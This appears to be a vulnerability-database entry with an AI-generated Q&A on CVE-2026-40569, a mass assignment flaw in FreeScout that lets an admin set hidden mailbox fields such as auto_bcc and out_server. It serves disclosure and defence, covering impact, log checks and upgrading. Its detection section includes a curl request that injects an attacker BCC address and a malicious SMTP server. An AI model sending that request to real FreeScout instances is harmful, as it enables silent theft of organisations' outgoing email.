CVE-2026-40569
Mass Assignment Vulnerability in FreeScout Mailbox Enables Email Exfiltration
Publication date: 2026-04-21
Last updated on: 2026-04-21
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| freescout | freescout | to 1.8.213 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
| CWE-915 | The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an authenticated admin to silently and persistently exfiltrate all outgoing emails by injecting unauthorized mailbox settings such as auto_bcc, which sends copies of emails to an attacker-controlled address without detection.
This undetectable exfiltration of potentially sensitive customer and communication data can lead to violations of data protection regulations such as GDPR and HIPAA, which require strict controls over personal and health information confidentiality and integrity.
By enabling attackers to redirect emails through malicious servers, inject phishing content, or disable encryption, the vulnerability compromises the confidentiality, integrity, and availability of email communications, further risking non-compliance with these standards.
In multi-admin environments or when admin sessions are compromised, this vulnerability can lead to large-scale, persistent breaches of sensitive data, undermining regulatory compliance obligations related to access control, data security, and breach notification.
Can you explain this vulnerability to me?
CVE-2026-40569 is a critical mass assignment vulnerability in FreeScout versions prior to 1.8.213 affecting the mailbox connection settings endpoints. The vulnerability arises because the methods handling incoming and outgoing mailbox connection settings (`connectionIncomingSave()` and `connectionOutgoingSave()`) pass all HTTP request parameters directly to the mailbox model's `fill()` method without filtering or allowlisting fields.
This allows an authenticated admin user to overwrite any of the 32 writable fields in the mailbox model, including sensitive security-related fields that are not normally exposed on the connection settings forms, such as `auto_bcc`, `out_server`, `out_password`, `signature`, and `auto_reply_enabled`.
Because validation is missing or insufficient, an attacker can inject hidden parameters (e.g., `[email protected]`) into legitimate requests, enabling silent and persistent manipulation of mailbox behavior. For example, the `auto_bcc` field causes every outgoing email to be silently BCC'd to the attacker without any UI indication or logging.
Other attack possibilities include redirecting outgoing SMTP traffic through attacker-controlled servers, injecting phishing links or tracking pixels into email signatures, and enabling malicious auto-replies. This vulnerability is especially dangerous in multi-admin environments or if an admin session is compromised.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including complete compromise of mailbox confidentiality and integrity. An attacker with admin access can silently exfiltrate all outgoing emails by injecting an `auto_bcc` address, allowing them to receive copies of all communications without detection.
Additionally, the attacker can redirect outgoing emails through malicious SMTP servers, enabling interception, modification, or phishing attacks. They can also inject malicious content such as tracking pixels or phishing links into email signatures or enable automated phishing auto-replies.
Because the injected changes are invisible on the connection settings form, other administrators are unlikely to detect the compromise. The attacker gains persistent control that survives session expiry, leading to long-term undetected data leakage and potential large-scale compromise of email communications.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring HTTP requests to the mailbox connection settings endpoints in FreeScout, specifically the POST requests to the endpoints handled by the methods `connectionIncomingSave()` and `connectionOutgoingSave()` in `app/Http/Controllers/MailboxesController.php`.
Look for requests that include unexpected or hidden parameters such as `auto_bcc`, `out_server`, `out_password`, `signature`, `auto_reply_enabled`, or `auto_reply_message` which are not normally present in the connection settings forms.
Detection can be done by intercepting and inspecting HTTP traffic using tools like Burp Suite or by analyzing web server logs for suspicious POST parameters.
Example commands to detect suspicious requests include:
- Using curl to test if unauthorized fields can be set (replace URL and authentication accordingly): curl -X POST -d "[email protected]&out_server=malicious.server" -u admin:password https://your-freescout-instance/api/mailbox/connectionOutgoingSave
- Using grep on web server logs to find suspicious parameters: grep -E 'auto_bcc|out_password|auto_reply_enabled' /var/log/nginx/access.log
- Using Burp Suite or similar HTTP proxy to intercept and inspect POST requests to mailbox connection settings endpoints for unexpected parameters.
What immediate steps should I take to mitigate this vulnerability?
The immediate and recommended step to mitigate this vulnerability is to upgrade FreeScout to version 1.8.213 or later, where the issue has been fixed.
The fix involves restricting which fields can be populated on the mailbox fetching and sending settings pages by filtering input parameters to only allow a predefined set of safe keys.
- Upgrade FreeScout to version 1.8.213 or newer.
- Ensure that the `connectionIncomingSave()` and `connectionOutgoingSave()` methods only accept and save allowed fields, preventing mass assignment of unauthorized fields.
- Restore and enable proper validation on incoming parameters for mailbox connection settings.
- Monitor admin activity and audit mailbox settings for suspicious changes, especially to hidden fields like `auto_bcc`.
If immediate upgrade is not possible, restrict admin access and monitor for suspicious POST requests to mailbox connection endpoints to reduce risk.